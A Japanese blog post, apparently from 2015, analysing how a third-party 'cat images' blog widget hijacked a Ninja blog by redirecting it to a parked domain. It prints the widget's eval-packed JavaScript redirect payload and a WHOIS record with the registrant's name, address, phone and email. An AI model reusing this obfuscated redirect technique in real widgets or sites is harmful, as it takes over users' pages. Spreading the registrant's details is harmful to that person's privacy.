(要約) とある忍者ブログが乗っ取られて、ブロガーさんが困っているとの情報を頂きました。 調べてみると、たしかに今はパーキングされているドメインページへ移動します。 さらに詳しく調べたら、ブログパーツ『猫画像』が原因のようでした。 なお、スクリプトタイプのブログパーツですので、Yahoo!ブログでの被害はないと思います。 http://c.statcounter.com/4440886/0/1c5b0b72/0/ 人閲覧者接続情報 http://www.robtex.com/ipinfo.gifとある忍者ブログが乗っ取られて、ブロガーさんが困っているとの情報を頂きました。 調べてみると、たしかに今はパーキングされているドメインページへ移動します。 さらに詳しく調べると、このようなスクリプトを見付けました。 <div class="PluginContents left"> <script src="http://cat.1on1battle.com/battle/blog_parts_tag"></script> <noscript><a href="http://cat.1on1battle.com/">猫画像</a></noscript> 試しにスクリプトアドレスのソースコードを調べると、やはりJSを利用して自動移動させています。 ヘッダ− HTTP/1.1 200 OK Content-Length: 457 Content-Type: application/x-javascript Content-Location: http://cat.1on1battle.com/battle/blog_parts_tag/index.js Last-Modified: Fri, 31 Oct 2014 16:40:50 GMT ソースコード eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('0="3://4.1-2.5/";8.9.6.7=0;',10,10,'JavaScriptRedirectURL|kyushu|journal|http|www|net|location|href|window|top'.split('|'),0,{}))
JavaScriptRedirectURLの後に続く部分に移動先のアドレスが埋め込まれています。 そのため、今はドメインパーキングされているwww.kyushu-journal.netへ自動移動しているのです。 スクリプトのヘッダ−には、2014年10月31日の日付があります。 一方、2014年12月9日の記事までは正常動作していたようですが、 2015年4月14日の記事では、『ブログが乗っ取られてる…。』と悲鳴を上げていました。 ブログが乗っ取られてる…。http://www.kyushu-journal.net/に! 借りてるとこに問い合わせしたけど、 たらい回しであかん…。( 2015/04/14(火) 22:45:49 ) どの時点で異変が起きたのかはっきりしませんが、少なくともブログパーツによってブログを乗っ取られる事態に陥ったことは間違いありません。 一体、ブログパーツ『猫画像』がどんなブログパーツだったのか、今では知る由もありません。 ブログの機能としてブログパーツを無効化した状態でメンテナンスができるのであれば、ブログパーツを取り外すだけで解決するでしょう。 しかし、メンテナンス画面でブログパーツも機能してしまうようでは回復不可能です。 幸いなことに、このブログパーツはスクリプトタイプでした。 Yahoo!ブログのメニューにはブログパーツを組み込めませんし、記事での利用も困難なためにYahoo!ブログでの被害はないものと思います。 ところで、誰が配布していたブログパーツだったのか気になるところですが、Whoisでは現在のドメインオーナーしか調べることができませんが、現在の所有者は中国になっていました。 Domain Name: 1on1battle.comRegistry Domain ID: 1836718717_DOMAIN_COM-VRSN Registrar WHOIS Server: whois.22.cn Registrar URL: http://www.22.cn Updated Date: 2013-11-25T01:11:49Z Creation Date: 2013-11-25T01:11:49Z Expiration Date: 2015-11-25T01:11:49Z Registrar: Hangzhou Aiming Network Co.,Ltd Registrant Name: wangziteng Registrant Organization: wangsongping Registrant Street: hubeishengxiangfanshixiangchengqutanxilu2haofu96hao Registrant City: xiangfan Registrant State/Province: hubei Registrant Postal Code: 441022 Registrant Country: CN Registrant Phone: +86.710.3576382 Registrant Fax: +86.710.3576382 Registrant Email: 9498585@qq.com それにしてもスクリプトタイプのブログパーツは、長期的に安定して運営されるサイトのもの以外、絶対に信用できないことになりますね。。。  Messaage Box 書庫 投稿ネタはコレに決まり! 話題のキーワードをチェック!梅雨入り, 安倍政権, 田植え, 憲法学者, 参考人, 安田記念, blank, 違憲, 中東呼吸器症候群, 安保法案, 戦争法案, facebook, MERS, 自衛権, 雨予報, https, 紫陽花, 花菖蒲, 鳴尾記念, image
|
スパム対策に関するお知らせ 
記事と無関係な多重コメントは無条件削除します 
>
- コンピュータとインターネット
>
- インターネット
>
- その他インターネット
難しすぎて解りません((((;゚Д゚)))))))
[ baldman ]
2015/6/6(土) 午後 9:39
bald manさん、こんばんわ
簡単に言えば、継続性が補償されないブログパーツを利用していると
そのサイトが無くなった時に自分のブログを開けなくなる可能性があるってことです。
利用していたブログパーツがページを自動移動させてしまい、
ブログを失ったのと同じ結果になりかねないんです。
2015/6/6(土) 午後 10:13
だから、乗っ取られる わけ?
[ baldman ]
2015/6/7(日) 午後 10:34
bald manさん、こんばんわ
今回のケースでも、ドメインが閉鎖している旨を示すページへ
ブログ丸ごと移動していたんです。
ブログパーツをブロックして設定しなおせば元に戻りますけどね。
2015/6/7(日) 午後 11:14